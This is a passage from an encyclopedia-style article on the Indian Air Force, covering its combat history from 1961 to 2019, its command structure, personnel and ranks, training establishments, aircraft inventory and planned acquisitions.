Portugal. Hunters attacked the wireless station at Bambolim. Vampires were used to provide air support to the ground forces. In Daman, Mystères were used to strike Portuguese gun positions. Ouragans (called Toofanis in the IAF) bombed the runways at Diu and destroyed the control tower, wireless station and the meteorological station. After the Portuguese surrendered the former colony was integrated into India. Border disputes and changes in the IAF (1962–1971) In 1962, border disagreements between China and India escalated to a war when China mobilised its troops across the Indian border. During the Sino-Indian War, India's military planners failed to deploy and effectively use the IAF against the invading Chinese forces. This resulted in India losing a significant amount of advantage to the Chinese; especially in Jammu and Kashmir. On 24 April 1965, an Indian Ouragan strayed over the Pakistani border and was forced to land by a Pakistani Lockheed F-104 Starfighter, the pilot was returned to India; however, the captured aircraft would be kept by the Pakistan Air Force(PAF) and ended up being displayed at the PAF museum in Peshawar. Three years after the Sino-Indian conflict, in 1965, Pakistan launched Operation Gibraltar, strategy of Pakistan to infiltrate Jammu and Kashmir, and start a rebellion against Indian rule. This came to be known as the Second Kashmir War. This was the first time the IAF actively engaged an enemy air force. However, instead of providing close air support to the Indian Army, the IAF carried out independent raids against PAF bases. These bases were situated deep inside Pakistani territory, making IAF fighters vulnerable to anti-aircraft fire. During the course of the conflict, the PAF enjoyed technological superiority over the IAF and had achieved substantial strategic and tactical advantage due to the suddenness of the attack and advanced state of their air force. The IAF was restrained by the government from retaliating to PAF attacks in the eastern sector while a substantive part of its combat force was deployed there and could not be transferred to the western sector, against the possibility of Chinese intervention. Moreover, international (UN) stipulations and norms did not permit military force to be introduced into the Indian state of J&K beyond what was agreed during the 1949 ceasefire. Despite this, the IAF was able to prevent the PAF from gaining air superiority over conflict zones. The small and nimble IAF Folland Gnats proved effective against the F-86 Sabres of the PAF earning it the nickname "Sabre Slayers". By the time the conflict had ended, the IAF lost 60–70 aircraft, while the PAF lost 43 aircraft. More than 60% of IAF's aircraft losses took place in ground attack missions to enemy ground-fire, since fighter-bomber aircraft would carry out repeated dive attacks on the same target. According to, Air Chief Marshal Arjan Singh of the Indian Air Force, despite having been qualitatively inferior, IAF achieved air superiority in three days in the 1965 War. After the 1965 war, the IAF underwent a series of changes to improve its capabilities. In 1966, the Para Commandos regiment was created. To increase its logistics supply and rescue operations ability, the IAF inducted 72 HS 748s which were built by Hindustan Aeronautics Limited (HAL) under licence from Avro. India started to put more stress on indigenous manufacture of fighter aircraft. As a result, HAL HF-24 Marut, designed by the famed German aerospace engineer Kurt Tank, were inducted into the air force. HAL also started developing an improved version of the Folland Gnat, known as HAL Ajeet. At the same time, the IAF also started inducting Mach 2 capable Soviet MiG-21 and Sukhoi Su-7 fighters. Bangladesh Liberation War (1971) By late 1971, the intensification of the independence movement in East Pakistan lead to the Bangladesh Liberation War between India and Pakistan. On 22 November 1971, 10 days before the start of a full-scale war, four PAF F-86 Sabre jets attacked Indian and Mukti Bahini positions at Garibpur, near the international border. Two of the four PAF Sabres were shot down and one damaged by the IAF's Folland Gnats. On 3 December, India formally declared war against Pakistan following massive preemptive strikes by the PAF against Indian Air Force installations in Srinagar, Ambala, Sirsa, Halwara and Jodhpur. However, the IAF did not suffer significantly because the leadership had anticipated such a move and precautions were taken. The Indian Air Force was quick to respond to Pakistani air strikes, following which the PAF carried out mostly defensive sorties. Within the first two weeks, the IAF had carried out almost 12,000 sorties over East Pakistan and also provided close air support to the advancing Indian Army. IAF also assisted the Indian Navy in its operations against the Pakistani Navy and Maritime Security Agency in the Bay of Bengal and Arabian Sea. On the western front, the IAF destroyed more than 20 Pakistani tanks, 4 APCs and a supply train during the Battle of Longewala. The IAF undertook strategic bombing of West Pakistan by carrying out raids on oil installations in Karachi, the Mangla Dam and a gas plant in Sindh. Similar strategy was also deployed in East Pakistan and as the IAF achieved complete air superiority on the eastern front, the ordnance factories, runways, and other vital areas of East Pakistan were severely damaged. By the time Pakistani forces surrendered, the IAF destroyed 94 PAF Aircraft The IAF was able to conduct a wide range of missions – troop support; air combat; deep penetration strikes; para-dropping behind enemy lines; feints to draw enemy fighters away from the actual target; bombing; and reconnaissance. In contrast, the Pakistan Air Force, which was solely focused on air combat, was blown out of the subcontinent's skies within the first week of the war. Those PAF aircraft that survived took refuge at Iranian air bases or in concrete bunkers, refusing to offer a fight. Hostilities officially ended at 14:30 GMT on 17 December, after the fall of Dacca on 15 December. India claimed large gains of territory in West Pakistan (although pre-war boundaries were recognised after the war), and the independence of Pakistan's East wing as Bangladesh was confirmed. The IAF had flown over 16,000 sorties on both East and West fronts; including sorties by transport aircraft and helicopters. while the PAF flew about 30 and 2,840. More than 80 per cent of the IAF's sorties were close-support and interdiction, and according to neutral assessments about 45 IAF Aircraft were lost while, Pakistan lost 75 aircraft. Not including any F-6s, Mirage IIIs, or the six Jordanian F-104s which failed to return to their donors. But the imbalance in air losses was explained by the IAF's considerably higher sortie rate, and its emphasis on ground-attack missions. On the ground Pakistan suffered most, with 9,000 killed and 25,000 wounded while India lost 3,000 dead and 12,000 wounded. The loss of armoured vehicles was similarly imbalanced. This represented a major defeat for Pakistan. Towards the end of the war, IAF's transport planes dropped leaflets over Dhaka urging the Pakistani forces to surrender, demoralising Pakistani troops in East Pakistan. Incidents before Kargil (1984–1988) In 1984, India launched Operation Meghdoot to capture the Siachen Glacier in the contested Kashmir region. In Op Meghdoot, IAF's Mi-8, Chetak and Cheetah helicopters airlifted hundreds of Indian troops to Siachen. Launched on 13 April 1984, this military operation was unique because of Siachen's inhospitable terrain and climate. The military action was successful, given the fact that under a previous agreement, neither Pakistan nor India had stationed any personnel in the area. With India's successful Operation Meghdoot, it gained control of the Siachen Glacier. India has established control over all of the long Siachen Glacier and all of its tributary glaciers, as well as the three main passes of the Saltoro Ridge immediately west of the glacier—Sia La, Bilafond La, and Gyong La. Pakistan controls the glacial valleys immediately west of the Saltoro Ridge. According to the TIME magazine, India gained more than of territory because of its military operations in Siachen. Following the inability to negotiate an end to the Sri Lankan Civil War, and to provide humanitarian aid through an unarmed convoy of ships, the Indian Government decided to carry out an airdrop of the humanitarian supplies on the evening of 4 June 1987 designated Operation Poomalai (Tamil: Garland) or Eagle Mission 4. Five An-32s escorted by four Mirage 2000 of 7 Sqn AF, 'The Battleaxes', carried out the supply drop which faced no opposition from the Sri Lankan Armed Forces. Another Mirage 2000 orbited 150 km away, acting as an airborne relay of messages to the entire fleet since they would be outside radio range once they descended to low levels. The Mirage 2000 escort formation was led by Wg Cdr Ajit Bhavnani, with Sqn Ldrs Bakshi, NA Moitra and JS Panesar as his team members and Sqn Ldr KG Bewoor as the relay pilot. Sri Lanka accused India of "blatant violation of sovereignty". India insisted that it was acting only on humanitarian grounds. In 1987, the IAF supported the Indian Peace Keeping Force (IPKF) in northern and eastern Sri Lanka in Operation Pawan. About 70,000 sorties were flown by the IAF's transport and helicopter force in support of nearly 100,000 troops and paramilitary forces without a single aircraft lost or mission aborted. IAF An-32s maintained a continuous air link between air bases in South India and Northern Sri Lanka transporting men, equipment, rations and evacuating casualties. Mi-8s supported the ground forces and also provided air transportation to the Sri Lankan civil administration during the elections. Mi-25s of No. 125 Helicopter Unit were utilised to provide suppressive fire against militant strong points and to interdict coastal and clandestine riverine traffic. On the night of 3 November 1988, the Indian Air Force mounted special operations to airlift a parachute battalion group from Agra, non-stop over to the remote Indian Ocean archipelago of the Maldives in response to Maldivian president Gayoom's request for military help against a mercenary invasion in Operation Cactus. The IL-76s of No. 44 Squadron landed at Hulhule at 0030 hours and the Indian paratroopers secured the airfield and restored Government rule at Male within hours. Four Mirage 2000 aircraft of 7 Sqn, led by Wg Cdr AV 'Doc' Vaidya, carried out a show of force early that morning, making low-level passes over the islands. Kargil War (1999) On 11 May 1999, the Indian Air Force was called in to provide close air support to the Indian Army at the height of the ongoing Kargil conflict with the use of helicopters. The IAF strike was code named Operation Safed Sagar. The first strikes were launched on 26 May, when the Indian Air Force struck infiltrator positions with fighter aircraft and helicopter gunships. The initial strikes saw MiG-27s carrying out offensive sorties, with MiG-21s and later MiG-29s providing fighter cover. The IAF also deployed its radars and the MiG-29 fighters in vast numbers to keep check on Pakistani military movements across the border. Srinagar Airport was at this time closed to civilian air-traffic and dedicated to the Indian Air Force. On 27 May, the Indian Air Force suffered its first fatality when it lost a MiG-21 and a MiG-27 in quick succession. The following day, while on an offensive sortie, a Mi-17 was shot down by three Stinger missiles and lost its entire crew of four. Following these losses the IAF immediately withdrew helicopters from offensive roles as a measure against the threat of Man-portable air-defence systems (MANPAD). On 30 May, the Mirage 2000s were introduced in offensive capability, as they were deemed better in performance under the high-altitude conditions of the conflict zone. Mirage 2000s were not only better equipped to counter the MANPAD threat compared to the MiGs, but also gave IAF the ability to carry out aerial raids at night. The MiG-29s were used extensively to provide fighter escort to the Mirage 2000. Radar transmissions of Pakistani F-16s were picked up repeatedly, but these aircraft stayed away. The Mirages successfully targeted enemy camps and logistic bases in Kargil and severely disrupted their supply lines. Mirage 2000s were used for strikes on Muntho Dhalo and the heavily defended Tiger Hill and paved the way for their early recapture. At the height of the conflict, the IAF was conducting over forty sorties daily over the Kargil region. By 26 July, the Indian forces had successfully repulsed the Pakistani forces from Kargil. Post Kargil incidents (1999–present) Since the late 1990s, the Indian Air Force has been modernising its fleet to counter challenges in the new century. The fleet size of the IAF has decreased to 33 squadrons during this period because of the retirement of older aircraft. Still, India maintains the fourth largest air force in the world. The IAF plans to raise its strength to 42 squadrons. Self-reliance is the main aim that is being pursued by the defence research and manufacturing agencies. On 10 August 1999, IAF MiG-21s intercepted a Pakistan Navy Breguet Atlantique which was flying over Sir Creek, a disputed territory. The aircraft was shot down killing all 16 Pakistani Navy personnel on board. India claimed that the Atlantic was on a mission to gather information on IAF air defence, a charge emphatically rejected by Pakistan which argued that the unarmed aircraft was on a training mission. On 2 August 2002, the Indian Air Force bombed Pakistani posts along the Line of Control in the Kel sector, following inputs about Pakistani military buildup near the sector. On 20 August 2013, the Indian Air Force created a world record by performing the highest landing of a C-130J at the Daulat Beg Oldi airstrip in Ladakh at the height of . The medium-lift aircraft will be used to deliver troops, supplies and improve communication networks. The aircraft belonged to the Veiled Vipers squadron based at Hindon Air Force Station. On 13 July 2014, two MiG-21s were sent from Jodhpur Air Base to investigate a Turkish Airlines aircraft over Jaisalmer when it repeated an identification code, provided by another commercial passenger plane that had already entered Indian airspace before it. The flights were on their way to Mumbai and Delhi, and the planes were later allowed to proceed after their credentials were verified. 2019 Balakot airstrike Following heightened tensions between India and Pakistan after the 2019 Pulwama attack that was carried out by Jaish-e-Mohammed (JeM) which killed forty-six servicemen of the Central Reserve Police Force, a group of twelve Mirage 2000 fighter planes from the Indian Air Force carried out air strikes on alleged JeM bases in Chakothi and Muzaffarabad in the Pakistan-administered Kashmir. Furthermore, the Mirage 2000s targeted an alleged JeM training camp in Balakot, a town in the Pakistani province of Khyber Pakhtunkhwa. Pakistan claimed that the Indian aircraft had only dropped bombs in the forest area demolishing pine trees near the Jaba village which is away from Balakot and Indian officials claimed to bomb and kill a large number of terrorists in the airstrike. 2019 India–Pakistan standoff On 27 February 2019, in retaliation for the IAF bombing of an alleged terrorist hideout in Balakot, a group of PAF Mirage-5 and JF-17 fighters allegedly conducted an airstrike against certain ground targets across the Line of Control. They were intercepted by a group of IAF fighters consisting of Su-30MKI and MiG-21 jets. An ensuing dogfight began. According to India, one PAF F-16 was shot down by an IAF MiG-21 piloted by Abhinandan Varthaman, while Pakistan denied use of F-16s in the operation. According to Pakistan, a MiG-21 and a Su30MKI were shot down, while India claims that only the MiG-21 was shot down. Indian officials rejected Pakistani claims of shooting down an Su-30MKI stating that its impossible to hide an aircraft crash as of now in populated area like Kashmir and said its a coverup for the loss of F16. While the downed MiG-21's pilot had ejected successfully, he landed in Pakistan-administered Kashmir, and was captured by the Pakistan military. Before his capture he was assaulted by a few locals. After a couple of days of captivity, the captured pilot was released by Pakistan per Third Geneva convention obligations. While Pakistan denied involvement of any of its F-16 aircraft in the strike, the IAF presented remnants of AMRAAM missiles that are only carried by the F-16s within the PAF as proof of their involvement. The US-based ''Foreign Policy'' magazine, quoting unnamed US officials, reported in April 2019 that an audit didn't find any Pakistani F-16s missing. However, the same has not been confirmed by US Official citing it as bilateral matter between US and Pakistan Structure The President of India is the Supreme Commander of all Indian armed forces and by virtue of that fact is the national Commander-in-chief of the Air Force. The Chief of the Air Staff with the rank of Air chief marshal is the Commander In January 2002, the government conferred the rank of Marshal of the Indian Air Force on Arjan Singh making him the first and only Five-star officer with the Indian Air Force and ceremonial chief of the air force. Commands The Indian Air Force is divided into five operational and two functional commands. Each Command is headed by an Air Officer Commanding-in-Chief with the rank of Air Marshal. The purpose of an operational command is to conduct military operations using aircraft within its area of responsibility, whereas the responsibility of functional commands is to maintain combat readiness. Aside from the Training Command at Bangalore, the primary flight training is done at the Air Force Academy (located in Hyderabad), followed by operational training at various other schools. Advanced officer training for command positions is also conducted at the Defence Services Staff College; specialised advanced flight training schools are located at Bidar, Karnataka and Hakimpet, Telangana (also the location for helicopter training). Technical schools are found at a number of other locations. {| class="wikitable sortable" |- ! Name !! Headquarters !! Commander |- |Central Air Command (CAC)||Prayagraj, Uttar Pradesh |Air Marshal Richard John Duckworth, AVSM, VSM |- |Eastern Air Command (EAC)||Shillong, Meghalaya |Air Marshal Dilip Kumar Patnaik, AVSM, VM |- |Southern Air Command (SAC)||Thiruvananthapuram, Kerala |Air Marshal Jonnalagedda Chalapati, AVSM, VSM |- |South Western Air Command (SWAC)||Gandhinagar, Gujarat |Air Marshal Vikram Singh, AVSM, VSM |- |Western Air Command (WAC)||New Delhi |Air Marshal Amit Dev, PVSM, AVSM, VM<ref name="aoc-wac">{{cite web|url=https://www.outlookindia.com/newsscroll/air-marshal-amit-dev-takes-charge-of-iafs-western-air-command/2171219|title= Air Marshal Amit Dev takes charge of IAFs Western Air Command|publisher=Outlook India|date=2021-10-01}}</ref> |- |Training Command (TC)+||Bangalore, Karnataka |Air Marshal Manavendra Singh, PVSM, AVSM, VrC, VSM, ADC |- |Maintenance Command (MC)+||Nagpur, Maharashtra |Air Marshal Shashiker Choudhary, PVSM, AVSM, VSM, ADC |}Note: + = Functional CommandWings A wing is a formation intermediate between a command and a squadron. It generally consists of two or three IAF squadrons and helicopter units, along with forward base support units (FBSU). FBSUs do not have or host any squadrons or helicopter units but act as transit airbases for routine operations. In times of war, they can become fully fledged air bases playing host to various squadrons. In all, about 47 wings and 19 FBSUs make up the IAF. Wings are typically commanded by an air commodore. Stations Within each operational command are anywhere from nine to sixteen bases or stations. Smaller than wings, but similarly organised, stations are static units commanded by a group captain. A station typically has one wing and one or two squadrons assigned to it. Squadrons and units Squadrons are the field units and formations attached to static locations. Thus, a flying squadron or unit is a sub-unit of an air force station which carries out the primary task of the IAF. A fighter squadron consists of 18 aircraft; all fighter squadrons are headed by a commanding officer with the rank of wing commander. Some transport squadrons and helicopter units are headed by a commanding officer with the rank of group captain. Flights Flights are sub-divisions of squadrons, commanded by a squadron leader. Each flight consists of two sections. Sections The smallest unit is the section, led by a flight lieutenant. Each section consists of three aircraft. Within this formation structure, IAF has several service branches for day-to-day operations. They are: Garud Commando Force The Garud commandos are the special forces of the Indian Air Force (IAF). Their tasks include counter-terrorism, hostage rescue, providing security to IAF's vulnerably located assets and various air force-specific special operations. First conceived in 2002, this unit was officially established on February 6, 2004. All Garuds are volunteers who are imparted a 52-week basic training, which includes a three-month probation followed by special operations training, basic airborne training and other warfare and survival skills. The last phase of basic training sees Garuds been deployed to get combat experience. Advanced training follows, which includes specialised weapons training. The mandated tasks of the Garuds include direct action, special reconnaissance, rescuing downed pilots in hostile territory, establishing airbases in hostile territory and providing air-traffic control to these airbases. The Garuds also undertake suppression of enemy air defences and the destruction of other enemy assets such as radars, evaluation of the outcomes of Indian airstrikes and use laser designators to guide Indian airstrikes. The security of IAF installations and assets are usually performed by the Air Force Police and the Defence Security Corps even though some critical assets are protected by the Garuds. Integrated Space Cell An Integrated Space Cell, which will be jointly operated by all the three services of the Indian armed forces, the civilian Department of Space and the Indian Space Research Organisation (ISRO) has been set up to utilise more effectively the country's space-based assets for military purposes. This command will leverage space technology including satellites. Unlike an aerospace command, where the air force controls most of its activities, the Integrated Space Cell envisages co-operation and co-ordination between the three services as well as civilian agencies dealing with space. India currently has 10 remote sensing satellites in orbit. Though most are not meant to be dedicated military satellites, some have a spatial resolution of or below which can be also used for military applications. Noteworthy satellites include the Technology Experiment Satellite (TES) which has a panchromatic camera (PAN) with a resolution of , the RISAT-2 which is capable of imaging in all-weather conditions and has a resolution of , the CARTOSAT-2, CARTOSAT-2A and CARTOSAT-2B which carries a panchromatic camera which has a resolution of (black and white only). Display teamsThe Surya Kiran Aerobatic Team (SKAT) (Surya Kiran is Sanskrit for Sun Rays) is an aerobatics demonstration team of the Indian Air Force. They were formed in 1996 and are successors to the Thunderbolts. The team has a total of 13 pilots (selected from the fighter stream of the IAF) and operate 9 HAL HJT-16 Kiran Mk.2 trainer aircraft painted in a "day-glo orange" and white colour scheme. The Surya Kiran team were conferred squadron status in 2006, and presently have the designation of 52 Squadron ("The Sharks"). The team is based at the Indian Air Force Station at Bidar. The IAF has begun the process of converting Surya Kirans to BAE Hawks.Sarang (Sanskrit for Peacock) is the Helicopter Display Team of the Indian Air Force. The team was formed in October 2003 and their first public performance was at the Asian Aerospace Show, Singapore, 2004. The team flies four HAL Dhruvs painted in red and white with a peacock figure at each side of the fuselage. The team is based at the Sulur Air Force Station, Coimbatore. Personnel Over the years reliable sources provided notably divergent estimates of the personnel strength of the Indian Air Force after analysing open-source intelligence. The public policy organisation GlobalSecurity.org had estimated that the IAF had an estimated strength of 110,000 active personnel in 1994. In 2006, Anthony Cordesman estimated that strength to be 170,000 in the International Institute for Strategic Studies (IISS) publication "The Asian Conventional Military Balance in 2006". In 2010, James Hackett revised that estimate to an approximate strength of 127,000 active personnel in the IISS publication "Military Balance 2010". , the Indian Air Force has a sanctioned strength of 12,550 officers (12,404 serving with 146 under strength), and 142,529 airmen (127,172 serving with 15,357 under strength). Rank structure The rank structure of the Indian Air Force is based on that of the Royal Air Force. The highest rank attainable in the IAF is Marshal of the Indian Air Force, conferred by the President of India after exceptional service during wartime. MIAF Arjan Singh is the only officer to have achieved this rank. The head of the Indian Air Force is the Chief of the Air Staff, who holds the rank of Air Chief Marshal. Officers Anyone holding Indian citizenship can apply to be an officer in the Air Force as long as they satisfy the eligibility criteria. There are four entry points to become an officer. Male applicants, who are between the ages of 16 and 19 and have passed high school graduation, can apply at the Intermediate level. Men and women applicants, who have graduated from college (three-year course) and are between the ages of 18 and 28, can apply at the Graduate level entry. Graduates of engineering colleges can apply at the Engineer level if they are between the ages of 18 and 28 years. The age limit for the flying and ground duty branch is 23 years of age and for technical branch is 28 years of age. After completing a master's degree, men and women between the ages of 18 and 28 years can apply at the Post Graduate level. Post graduate applicants do not qualify for the flying branch. For the technical branch the age limit is 28 years and for the ground duty branch it is 25. At the time of application, all applicants below 25 years of age must be single. The IAF selects candidates for officer training from these applicants. After completion of training, a candidate is commissioned as a Flying Officer. Airmen The duty of an airman is to make sure that all the air and ground operations run smoothly. From operating Air Defence systems to fitting missiles, they are involved in all activities of an air base and give support to various technical and non-technical jobs. The airmen of Technical trades are responsible for maintenance, repair and prepare for use the propulsion system of aircraft and other airborne weapon delivery system, Radar, Voice/Data transmission and reception equipment, latest airborne weapon delivery systems, all types of light, mechanical, hydraulic, pneumatic systems of airborne missiles, aero engines, aircraft fuelling equipment and heavy duty mechanical vehicles, cranes and loading equipment etc. The competent and qualified Airmen from Technical trades also participate in flying as Flight Engineers, Flight Signallers and Flight Gunners. The recruitment of personnel below officer rank is conducted through All India Selection Tests and Recruitment Rallies. All India Selection Tests are conducted among 15 Airmen Selection Centres (ASCs) located all over India. These centres are under the direct functional control of Central Airmen Selection Board (CASB), with administrative control and support by respective commands. The role of CASB is to carry out selection and enrolment of airmen from the Airmen Selection Centres for their respective commands. Candidates initially take a written test at the time of application. Those passing the written test undergo a physical fitness test, an interview conducted in English, and medical examination. Candidates for training are selected from individuals passing the battery of tests, on the basis of their performance. Upon completion of training, an individual becomes an Airman. Some MWOs and WOs are granted honorary commission in the last year of their service as an honorary Flying Officer or Flight Lieutenant before retiring from the service. Honorary officers Sachin Tendulkar was the first sportsperson and the first civilian without an aviation background to be awarded the honorary rank of group captain by the Indian Air Force. Non combatants enrolled and civilians Non combatants enrolled (NCs(E)) were established in British India as personal assistants to the officer class, and are equivalent to the orderly or sahayak of the Indian Army. Almost all the commands have some percentage of civilian strength which are central government employees. These are regular ranks which are prevalent in ministries. They are usually not posted outside their stations and are employed in administrative and non-technical work. Training and education The Indian Armed Forces have set up numerous military academies across India for training its personnel, such as the National Defence Academy (NDA). Besides the tri-service institutions, the Indian Air Force has a Training Command and several training establishments. While technical and other support staff are trained at various Ground Training Schools, the pilots are trained at the Air Force Academy, Dundigul (located in Hyderabad). The Pilot Training Establishment at Allahabad, the Air Force Administrative College at Coimbatore, the Institute of Aerospace Medicine at Bangalore, the Air Force Technical College, Bangalore at Jalahalli, the Tactics and Air Combat and Defence Establishment at Gwalior, and the Paratrooper's Training School at Agra are some of the other training establishments of the IAF. Aircraft inventory The Indian Air Force has aircraft and equipment of Russian (erstwhile Soviet Union), British, French, Israeli, US and Indian origins with Russian aircraft dominating its inventory. HAL produces some of the Russian and British aircraft in India under licence. The exact number of aircraft in service with the Indian Air Force cannot be determined with precision from open sources. Various reliable sources provide notably divergent estimates for a variety of high-visibility aircraft. Flight International estimates there to be around 1,750 aircraft in service with the IAF, while the International Institute for Strategic Studies provides a similar estimate of 1,850 aircraft. Both sources agree there are approximately 900 combat capable (fighter, attack etc.) aircraft in the IAF. Multi-role fighters and strike aircraft Dassault Rafale: the latest addition to India's aircraft arsenal; India has signed a deal for 36 Dassault Rafale multirole fighter aircraft. As of Feb 2022, 35 Rafale fighters are in service with the Indian Air Force. Sukhoi Su-30MKI: the IAF's primary air superiority fighter, with additional air-to-ground (strike) mission capability, is the Sukhoi Su-30MKI. 272 Su-30MKIs have been in service with 12 more on order with HAL. Mikoyan MiG-29: the MiG-29, known as Baaz (Hindi for Hawk), is a dedicated air superiority fighter, constituting the IAF's second line of defence after the Su-30MKI. There are 69 MiG-29s in service, all of which have been recently upgraded to the MiG-29UPG standard, after the decision was made in 2016 to upgrade the remaining 21 MiG-29s to the UPG standard. Dassault Mirage 2000: the Mirage 2000, known as Vajra (Sanskrit for diamond or thunderbolt) in Indian service. The IAF currently operates 49 Mirage 2000Hs and 8 Mirage 2000 TH all of which are currently being upgraded to the Mirage 2000-5 MK2 standard with Indian specific modifications and 2 Mirage 2000-5 MK2 are in service . The IAF's Mirage 2000 are scheduled to be phased out by 2030. HAL Tejas: IAF MiG-21s are to be replaced by domestically built HAL Tejas. The first Tejas IAF unit, No. 45 Squadron IAF Flying Daggers, was formed on 1 July 2016, followed by No. 18 Squadron IAF "Flying Bullets" on 27 May 2020. Initially stationed at Bangalore, the first squadron was then to be transferred to its home base in Sulur, Tamil Nadu. In February 2021, the Indian Air Force ordered 83 Tejas, including 40 Mark 1, 73 single-seat Mark 1As and 10 two-seat Mark 1 trainers. Total 123 ordered. SEPECAT Jaguar: the Jaguar, known as the Shamsher, serves as the IAF's primary ground attack force. The IAF currently operates 139 Jaguars. The first batch of DARIN-1 Jaguars are now going through a DARIN-3 upgrade being equipped with EL/M-2052 AESA radars, and an improved jamming suite plus new avionics. These aircraft are scheduled to be phased out by 2030. Mikoyan-Gurevich MiG-21: the MiG-21 serves as an interceptor aircraft in the IAF, which phased out most of its MiG-21s and planned to keep only the 125 aircraft upgraded to the MiG-21 Bison standard. The phase-out date for these interceptors has been postponed several times. Initially set for 2014–2017, it was later postponed to 2019. Current phase-out is scheduled for 2021–2022. Airborne early warning and control system The IAF is currently training crews in the operation of indigenously developed DRDO AEW&CS, conducting the training on Embraer ERJ 145 aircraft. The IAF also operates the EL/W-2090 Phalcon AEW&C incorporated in a Beriev A-50 platform. A total of three such systems are currently in service, with two further potential orders. The two additional Phalcons are currently in negotiation to settle price differences between Russia and India. India is also going ahead with Project India, an in-house AWACS program to develop and deliver six Phalcon-class AWACS, based on DRDO work on the smaller AEW&CS. Aerial refuelling The IAF currently operates six Ilyushin Il-78MKIs in the aerial refueling (tanker) role. Transport aircraft For strategic airlift operations, the IAF uses the Ilyushin Il-76, known as Gajraj (Hindi for King Elephant) in Indian service. The IAF operated 17 Il-76s in 2010, which are in the process of being replaced by C-17 Globemaster IIIs. IAF C-130Js are used by special forces for combined Army-Air Force operations. India purchased six C-130Js; however, one crashed at Gwalior on 28 March 2014 while on a training mission, killing all 5 on board and destroying the aircraft. The Antonov An-32, known in Indian service as the Sutlej'' (named after Sutlej River), serves as a medium transport aircraft in the IAF. The aircraft is also used in bombing roles and paradropping operations. The IAF currently operates 105 An-32s, all of which are being upgraded. The IAF operates 53 Dornier 228 to fullfill its light transport duties. The IAF also operates Boeing 737s and Embraer ECJ-135 Legacy aircraft as VIP transports and passenger airliners for troops. Other VIP transport aircraft are used for both the Indian President and Prime Minister under the call sign Air India One. The Hawker Siddeley HS 748 once formed the backbone of the IAF's transport fleet, but are now used mainly for training and communication duties. A replacement is under consideration. Trainer aircraft The HAL HPT-32 Deepak is IAF's basic flight training aircraft for cadets. The HPT-32 was grounded in July 2009 following a crash that killed two senior flight instructors, but was revived in May 2010 and is to be fitted with a parachute recovery system (PRS) to enhance survivability during an emergency in the air and to bring the trainer down safely. The HPT-32 is to be phased out soon. The HPT 32 has been replaced by Pilatus, a Swiss aircraft. The IAF uses the HAL HJT-16 Kiran mk.I for intermediate flight training of cadets, while the HJT-16 Kiran mk.II provides advanced flight and weapons training. The HAL HJT-16 Kiran Mk.2 is also operated by the Surya Kiran Aerobatic Team (SKAT) of the IAF. The Kiran is to be replaced by the HAL HJT-36 Sitara. The BAE Hawk Mk 132 serves as an advanced jet trainer in the IAF and is progressively replacing the Kiran Mk.II. The IAF has begun the process of converting the Surya Kiran display team to Hawks. A total of 106 BAE Hawk trainers have been ordered by the IAF of which 39 have entered service . IAF also ordered 72 Pipistrel Virus SW 80 microlight aircraft for basic training purpose. Helicopters The HAL Dhruv serves primarily as a light utility helicopter in the IAF. In addition to transport and utility roles, newer Dhruvs are also used as attack helicopters. Four Dhruvs are also operated by the Indian Air Force Sarang Helicopter Display Team. The HAL Chetak is a light utility helicopter and is used primarily for training, rescue and light transport roles in the IAF. The HAL Chetak is being gradually replaced by HAL Dhruv. The HAL Cheetah is a light utility helicopter used for high altitude operations. It is used for both transport and search-and-rescue missions in the IAF. The Mil Mi-8 and the Mil Mi-17, Mi-17 1V and Mi-17V 5 are operated by the IAF for medium lift strategic and utility roles. The Mi-8 is being progressively replaced by the Mi-17 series of helicopters. The IAF has ordered 22 Boeing AH-64E Apache attack helicopters, 68 HAL Light Combat Helicopters (LCH), 35 HAL Rudra attack helicopters, 15 CH-47F Chinook heavy lift helicopters and 150 Mi-17V-5s to replace and augment its existing fleet of Mi-8s, Mi-17s, and Mi-24s. The Mil Mi-26 serves as a heavy lift helicopter in the IAF. It can also be used to transport troops or as a flying ambulance. The IAF currently operates three Mi-26s. The Mil Mi-35 serves primarily as an attack helicopter in the IAF. The Mil Mi-35 can also act as a low-capacity troop transport. The IAF currently operates two squadrons (No. 104 Firebirds and No. 125 Gladiators) of Mi-25/35s. Unmanned Aerial Vehicles The IAF currently uses the IAI Searcher II and IAI Heron for reconnaissance and surveillance purposes. The IAI Harpy serves as an Unmanned Combat Aerial Vehicle (UCAV) which is designed to attack radar systems. The IAF also operates the DRDO Lakshya which serves as realistic towed aerial sub-targets for live fire training. Land-based missile systems Surface-To-Air Missiles The air force operates twenty-five squadrons of S-125 Pechora, six squadrons of 9K33 Osa-AK, ten flights of 9K38 Igla-1, thirteen squadrons of Akash along with eighteen squadron of SPYDER for air defence. Two squadrons of Akash were on ordered. IAF and Indian Army has both placed the order of 1,000 kit of MRSAM. Ballistic missiles The IAF currently operates the Prithvi-II short-range ballistic missile (SRBM). The Prithvi-II is an IAF-specific variant of the Prithvi ballistic missile. Future The number of aircraft in the IAF has been decreasing from the late 1990s due to the retirement of older aircraft and several crashes. To deal with the depletion of force levels, the IAF has started to modernise its fleet. This includes both the upgrade of existing aircraft, equipment and infrastructure as well as induction of new aircraft and equipment, both indigenous and imported. As new aircraft enter service and numbers recover, the IAF plans to have a fleet of 42 squadrons. Expected future acquisitions Single-engined fighter On 3 January 2017, Minister of Defence Manohar Parrikar addressed a media conference and announced plans for a competition to select a Strategic Partner to deliver "... 200 new single engine fighters to be made in India, which will easily cost around (USD)$45 million apiece without weaponry" with an expectation that Lockheed Martin (USA) and Saab (Sweden) will pitch the F-16 Block 70 and Gripen, respectively. An MoD official said that a global tender will be put to market in the first quarter of 2018, with a private company nominated as the strategic partners production agency followed by a two or more year process to evaluate technical and financial bids and conduct trials, before the final government-to-government deal in 2021. This represents 11 squadrons of aircraft plus several 'attrition' aircraft. India is also planning to set up an assembly line of American Lockheed Martin F-16 Fighting Falcon Block 70 in Bengaluru. It is not yet confirmed whether IAF will induct these aircraft or not. In 2018, the defence minister Nirmala Sitharaman gave the go ahead to scale up the manufacturing of Tejas at HAL and also to export Tejas. She is quoted saying "We are not ditching the LCA. We have not gone for anything instead of Tejas. We are very confident that Tejas Mark II will be a big leap forward to fulfil the single engine fighter requirement of the forces.". IAF committed to buy 201 Mark-II variant of the Tejas taking the total order of Tejas to 324. The government also scrapped the plan to import single engine fighters leading to reduction in reliance on imports thereby strengthening the domestic defence industry. The IAF also submitted a request for information to international suppliers for a stealth unmanned combat air vehicle (UCAV) Current acquisitions The IAF has placed orders for 123 HAL Tejas 40 Mark 1, 73 Mark 1A fighters and 10 Mark 1 trainers, 36 Dassault Rafale multi-role fighters, 106 basic trainer aircraft HAL HTT-40, 112 